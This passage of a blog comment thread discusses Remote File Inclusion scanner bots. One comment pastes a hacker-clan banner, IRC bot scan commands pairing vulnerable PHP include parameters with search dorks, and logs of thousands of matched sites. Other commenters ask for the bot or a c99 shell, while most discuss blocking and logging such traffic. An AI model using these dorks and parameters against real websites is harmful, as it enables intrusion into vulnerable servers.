    #*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*#
    #VuLNeRaBiLiTY SHELLZ By ALBANIA.SECURITY.CLAN STAFF @ IRC.FIER1.COM - IRC.UNIXHELL.COM - IRC.FIERICLAN.NET ) #
    #*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*#

    IRC.UNIXHELL.COM

    THE BEST WORLD OF A NEW STYLE OF LIFE 100% PUR ILLEGAL SHAKING

  6. jody Says:

    http://www.xshqiptaretx.org/x0rLzalboZ/stringvuln.txt
    STRINGS THERE
    :)
    :)
    !scan /surveys/survey.inc.php?path= inurl:surveys
    !scan index.php?body= inurl:”index.php?body=”
    (@Started)[Scanning] Dork: inurl:surveys
    (@Searching Altavista:0 Sites)
    (@Searching GOOGLE:168 Sites)
    (@Searching Yahoo:0 Sites)
    (@Scan)(Total:1111 Sites)
    (@Scan)(websearch:24 Sites)
    (@Searching Altavista:301 Sites)
    (@Searching GOOGLE:307 Sites)
    (@Searching Yahoo:0 Sites)
    (@Scan)(Total:1929 Sites)
    (@Scan)(websearch:530 Sites)

  7. Ronald Says:

    Those are easy to detect. I loged them also, they all use:

    - libwwwperl *.*
    - Java user-agent.

    99% of them are blocked upon entry on my site. I like clean logs.

  8. bunkacid Says:

    I still get the daily requests, and after reading this thread, I’m going to try sil’s mod_security idea.

    Thanks for the trackback.

  9. Dennis Day Says:

    I have noticed that we have been getting a lot of these scripts relaying through my server and was wondering if you knew where I could redirect these bastards.

  10. RSnake Says:

    I dunno, I’m up for suggestions. We could create a collection of them, to start blackhole-ing them. Something you could quickly upload to openDNS or your firewall.

  11. David Ulevitch Says:

    RSnake,

    We’re down to figure out a nice way of making this safe and effective. In fact, I would mind running some ideas that we’re tossing about with you. Dealing with dynamic IPs is problematic sometimes and it becomes more of an issue as we provide more security-related services.

    -davidu

  12. RSnake Says:

    Yah, David, drop me an email or something.

  13. Dennis Day Says:

    I have come up with a similar script that seems to deter these scripts

    setTimeout(\”trapDiv = new Div(); trapDiv.id = ‘div’+id; trapDiv.height = parseInt(id / 1000); trapDiv.innerHTML=’while (z.length ‘; \”, 2000);

  14. Lord Says:

    can u give me this kind of bots
    (@Started)[Scanning] Dork: inurl:surveys
    (@Searching Altavista:0 Sites)
    (@Searching GOOGLE:168 Sites)
    (@Searching Yahoo:0 Sites)
    ??

  15. edache Says:

    man i am in love with this furom is there any body that can teach me on how to hack a c99 shell or how to get mine thx very much

  16. Websecurity - Веб безпека Says:

    PHP Include атаки

    Існує такий різновид уразливостей як PHP Include. В даному разі мова йде про Remote PHP Include (Remote File Inclusion, RFI). І відповідно проводяться RFI атаки з вико…